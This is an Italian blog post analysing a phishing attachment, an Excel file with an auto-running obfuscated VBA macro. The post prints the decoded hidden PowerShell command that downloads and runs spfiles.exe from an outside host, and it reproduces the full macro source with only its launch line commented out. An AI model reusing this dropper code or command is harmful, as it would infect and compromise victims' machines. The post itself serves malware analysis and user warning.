mercoledì 3 maggio 2017

Virus

Qualche giorno fa è arrivata una mail ben fatta, non con i soliti errori ortografici o di traduzione, ma il cui mittente era sconosciuto e pertanto mi hanno chiesto di controllare se si poteva aprire l'allegato.

Il file allegato alla mail era un file zippato con password.

In effetti si trattava di un virus/malware che poi il mio antivirus ha classificato come "behavior monitoring", vediamo come è costruito.


questo il testo della mail


l'allegato "Order List and Products Samples.xls&doc.zip", protetto dalla password indicata nella mail, conteneva 2 file Excel:

Order List.xls
Products Samples.xls

ho provato quindi a disabilitare le macro in Excel e ad aprire i file.

Intanto contenevano la seguente immagine:


ma c'era anche una macro che si attiva automaticamente all'apertura del file excel:


la macro è apparentemente incomprensibile (ve la includo completa in fondo al post), poichè in pratica è cifrata e, chiamando una funzione interna alla macro, vengono composte alcune stringhe con i comandi da eseguire.

questo il comando di decodifica:

dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf

eseguito in un loop chiama la funzione craftmind e si costruisce un comando nella variabile wezvdmfahy

per esempio viene costruito il comando:

"Cmd.exe /c powERSheLL.EXE -wINdOwsTYLE hidDen -nOprofIlE -exeCUTiONPOLICy BypAss (NEw-ObjECt SYsTeM.NEt.WebClIENT).DoWnlOAdFilE('http://soliotex.com/spfiles.exe','%TEMP%\\spfiles.exe') & %TEMP%\\spfiles.exe"

quindi con : destroysnow = Replace(destroysnow, "UEnOer", "")

si ottiene "wsCRIPT.ShelL"

infine

Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)

fa in modo di eseguire i comandi che sono stati composti.

Viene scaricato il file eseguibile "spfiles.exe"; il file ha le seguenti caratteristiche:


Da notare che se tento di scaricare il file da Chrome mi viene impedito con il messaggio:


mentre se lancio direttamente il comando da CMD mi ritrovo poi il file nella cartella \Temp.

questa la segnalazione dell'antivirus


per cui attenzione gente, attenzione!

Sorgente macro completa (ho commentato la riga di lancio dei comandi):

Public Sub Workbook_Open()
eaglegroup = "gBQVy_pA5sJs>2 (KN$=0Ew0-O_b4j11EVCG$t> Q_S595YQsHT5Qe79MG.N=0KE{0tVV.g_WVeg_b_HC>+l1IJ$E2N5T5=)g9.2D0o<JW1nQ2lqOAq+Kdg2Fi+GlH1EV9(_VG'h$5t21=tpq1:9/*/_sgo5Kli<otVe1x{Q.V5Qc_K0o"
Dim iolsranghngbkftd As Long
iolsranghngbkftd = 44.832
'raiseskulllaptopquestion
If iolsranghngbkftd <> 230.537 Then
Dim brainclog As Integer
brainclog = 10.84
Dim alientaxi As Boolean
alientaxi = 217.28
Dim joxiqvgxdvgkqmgyopy As Long
joxiqvgxdvgkqmgyopy = 91.619
'ycbegsrtudqczxoqcnykmdjjzlogrwnwwfw
Dim dreamtraffic As Integer
dreamtraffic = 199.708
'offstruggleassiststick
Dim slwqxskkifrtvenu As Long
slwqxskkifrtvenu = 200.104
'ruebqudmmebblabtackle
End If
reflectteam = "g2m/QspH7fVilg*eJ$s.e>x91e_q'g,'%+gVT_EMP%4\K\GQs=pf_2i{$$le+s_.eq+xK1e5'417) &7 5%$TGE=QM0P54%K\VQ\0s=*{pQf>i7l>4+eqs1.ex22e"
Dim rzbfufttloytjs As Long
rzbfufttloytjs = 130.134
'merryturkeybottomeconomy
If rzbfufttloytjs > 188.414 Then
Dim arrestthere As Long
arrestthere = 162.5
Dim chiefvery As Integer
chiefvery = 117.885
Dim yixagrgcr As Long
yixagrgcr = 200.738
End If
Dim candyfault As Boolean
candyfault = 13.585
If candyfault > 23.534 Then
Dim vwlilpqhuxtipaskn As Long
vwlilpqhuxtipaskn = 7.115
'actressgiantyoyiwlkldcxh
Dim jbshgptnywhlrbpj As Byte
jbshgptnywhlrbpj = 45.835
Dim ydvehonazfhowoy As String
ydvehonazfhowoy = "aeefksshtloph"
Dim jddslzdfsknuyqdepv As Integer
jddslzdfsknuyqdepv = 181.785
End If
metalnerve = "$JJCm>dK4.<<ge4xe g5$/Jc= =pow2gEKRS__*hQ9eVLLQV.>EgXQE<2 54-*9wgI>N1$dHOw2s_5qTQVY1gL24E$K h+$iV5*dD+Qe59n 5-n<Op$=Qr2Qo21_f9+IlKEK0G -+VQexHeQ_C9<U4TQi=_4O9NQPO>KgLI>4_CK=y*g " & eaglegroup & reflectteam
Dim hthtzusrclibawldwhp As Boolean
hthtzusrclibawldwhp = 176.19
'fanobligewldlriazw
If hthtzusrclibawldwhp = 223.647 Then
Dim jhuwvmdasyhlngd As Integer
jhuwvmdasyhlngd = 40.49
Dim blushexit As Long
blushexit = 107.607
Dim crouchship As Byte
crouchship = 69.793
Dim mjzylkwylerwg As Boolean
mjzylkwylerwg = 101.142
'garmentpandanutother
End If
Dim kwgsfdzsgi As Integer
kwgsfdzsgi = 216.607
'cinnamonmanageboiltooth
Dim clothlive As Integer
clothlive = 218.863
Dim babygap As Byte
babygap = 70.12
'busymancoconutglide
wezvdmfahy = ""
Dim petsniff As Double
petsniff = 227.631
Dim includerubber As Byte
includerubber = 226.16
Dim ylljenciotrnbmbozac As Integer
ylljenciotrnbmbozac = 208.153
'bombmiddlecitizenevoke
If ylljenciotrnbmbozac < 194.709 Then
Dim birthugly As Long
birthugly = 203.59
Dim satisfysing As Integer
satisfysing = 218.885
'cliffswimauctioncelery
Dim dropvapor As Integer
dropvapor = 140.22
End If
For dayseminar = 1 To Len(metalnerve)
Dim whohxodurmteyyotxy As Long
whohxodurmteyyotxy = 162.459
Dim defensepresent As Double
defensepresent = 121.304
Dim iwrgpvwduuj As Integer
iwrgpvwduuj = 2.986
dxvtzzksf = craftmind(Mid(metalnerve, dayseminar, 1), "24=*$H2=950_KJV9V+_q+71Q02<<V{gKgQ5>$Q51Gg4")
wezvdmfahy = wezvdmfahy & dxvtzzksf
Dim bxadkhschpylpd As Integer
bxadkhschpylpd = 67.874
'benchcreamsqueezeterm
Dim girlpraise As Long
girlpraise = 20.759
Dim fcuvvpihqzl As Integer
fcuvvpihqzl = 96.874
Dim toolvapor As Integer
toolvapor = 147.856
Dim vppbrpbvbzr As Double
vppbrpbvbzr = 152.141
Next
Dim insaneobtain As Long
insaneobtain = 174.536
'bqxhwzeltivegavixydclimbsail
If insaneobtain > 225.757 Then
Dim exactillness As Double
exactillness = 55.322
Dim hivnwlmjr As Integer
hivnwlmjr = 181.932
'muscleoffkxxhqntrjdyildntd
Dim footportion As Integer
footportion = 109.374
Dim iszxdpkyunmrpan As Double
iszxdpkyunmrpan = 38.553
'psjxlaefmurodustimpose
End If
Dim hopesurvey As Double
hopesurvey = 181.116
Dim isfptlrxoyldjthyrpr As Boolean
isfptlrxoyldjthyrpr = 239.81
Dim hzibrwpaqygcul As Byte
hzibrwpaqygcul = 31.93
destroysnow = "wsUEnOerCUEnOerRIUEnOerPT.UEnOerShUEnOerelLUEnOer"
Dim erajump As Boolean
erajump = 201.376
'imthesonhidjrpvggbmsqxk
If erajump = 62.812 Then
Dim qwwwzvoktpcxotx As String
qwwwzvoktpcxotx = "manualvictory"
'guitarmeritinhkrgloktzsrhhry
Dim cloudpaddle As String
cloudpaddle = "bardrum"
End If
destroysnow = Replace(destroysnow, "UEnOer", "")
Dim dckmxwierruvfufh As Byte
dckmxwierruvfufh = 236.166
'ptzvrrhhieuteougpkr
Dim mbnrtgrfkzc As Long
mbnrtgrfkzc = 76.15
Dim thanktravel As Double
thanktravel = 156.65
Dim kvdymawknajgr As Double
kvdymawknajgr = 106.21
Dim currentinherit As Byte
currentinherit = 123.918
Dim cjhoxupxatcajmkl As Double
cjhoxupxatcajmkl = 212.729
'dyrffonfflhugkqvvtlibertytool
Dim qkpogadjh As Double
qkpogadjh = 47.471
Dim lovetail As Double
lovetail = 251.368
'rescueimcekbjwun
Dim clifftask As Boolean
clifftask = 101.927
'coyotedaringngumcranoztponff
Set zzjokpxkruedw = CreateObject(destroysnow)
Dim iazurshzpra As Boolean
iazurshzpra = 116.98
If iazurshzpra > 80.985 Then
Dim twrjmoneoubu As Integer
twrjmoneoubu = 215.87
'nxuxhnpuxalleyjazz
Dim gmijzwnoiezsbybq As String
gmijzwnoiezsbybq = "authorthrive"
'distancesuspectruntotal
Dim crucialfather As String
crucialfather = "snxaxscwztgh"
Dim flashjust As Long
flashjust = 212.614
End If
dxvtzzksf = Replace("eiowneiownRUeiownNeiown", "eiown", "")
Dim cyfospoaasfoht As Long
cyfospoaasfoht = 85.124
If cyfospoaasfoht < 107.967 Then
Dim lonelytraffic As Byte
lonelytraffic = 96.41
Dim tualzudkhwfgihra As Boolean
tualzudkhwfgihra = 81.961
Dim beanstruggle As Integer
beanstruggle = 53.445
'crazyoffermenuquiz
Dim moazcyhfr As Integer
moazcyhfr = 229.692
Dim ptzwfjebix As Double
ptzwfjebix = 45.356
'rmmokylbuopalmrace
End If
' ---- ATTENZIONE ---- commentato riga di lancio comandi
'Call VBA.CallByName(zzjokpxkruedw, dxvtzzksf, 34 - 33, wezvdmfahy, Len("34902") - 5)
' ------------------------------------------------------
Dim learnvelvet As Boolean
learnvelvet = 2.121
'crypencilmrkgasqjagwimcjg
If learnvelvet <> 223.69 Then
Dim officetube As Integer
officetube = 182.406
Dim firering As Double
firering = 126.321
Dim quitswarm As Double
quitswarm = 35.787
'flstzcdcddfmokptwiwhlimah
Dim cannonprivate As Byte
cannonprivate = 83.148
End If

Dim bpektawab As Boolean
bpektawab = 15.729
'dressresembledizzylizard
Dim fruithospital As Byte
fruithospital = 124.877
Dim elephantplace As String
elephantplace = "pyupwlzsgsesjogc"
Dim olivequantum As Boolean
olivequantum = 174.257
'mistaketellclusterpudding
Dim surgewant As String
surgewant = "chasejust"
End Sub
Function craftmind(awrocxifwhdpbzlwev, stadiumtrue)
retVaawrocxifwhdpbzlwev = ""
Dim ladderspot As Double
ladderspot = 171.9
If ladderspot > 137.912 Then
Dim trujecqfdn As Double
trujecqfdn = 6.68
Dim vrnscxffkklozbb As Byte
vrnscxffkklozbb = 206.831
'bodyflushcemicpvkbxvcvjyysg
Dim fdalrtffkq As Byte
fdalrtffkq = 65.877
Dim bcqjcxtlxjtdzoxzwcx As Integer
bcqjcxtlxjtdzoxzwcx = 176.794
'jsgzijpohzcfaujiwbpxmgbeqfmtm
Dim sdcptgqroqfjpk As Byte
sdcptgqroqfjpk = 62.585
'changetortoisecnnghuqklglcp
End If
zjpgfbadiggqbjbb = "*" & awrocxifwhdpbzlwev & "*"
Dim fvbmcjqvmjeayiyh As Byte
fvbmcjqvmjeayiyh = 69.11
Dim rudesolve As Integer
rudesolve = 162.413
Dim bicyclejunior As Integer
bicyclejunior = 225.708
'cannontimberkepsmbpot
If bicyclejunior < 109.204 Then
Dim flnijswyk As String
flnijswyk = "beachenhance"
Dim jejkarsltaltubm As Double
jejkarsltaltubm = 195.858
End If
dxvtzzksf = ""
Dim pausesleep As Long
pausesleep = 176.616
If pausesleep = 114.444 Then
Dim coolprevent As Byte
coolprevent = 47.44
Dim blymrrcupyquepkvurk As Long
blymrrcupyquepkvurk = 145.457
Dim accountbrother As Long
accountbrother = 15.151
'imuhjyesdjouabfcultureexpose
End If
If Not stadiumtrue Like zjpgfbadiggqbjbb Then
dxvtzzksf = awrocxifwhdpbzlwev
End If
craftmind = dxvtzzksf
Dim oqgidcyjtrzcxyysqey As Boolean
oqgidcyjtrzcxyysqey = 207.787
Dim keeprace As Long
keeprace = 177.348
'qiwulyjbtqtckbbpgtzedkinr
Dim carpetcrop As Byte
carpetcrop = 70.13
Dim biologyfoster As Byte
biologyfoster = 237.112
End Function




Nessun commento:

Posta un commento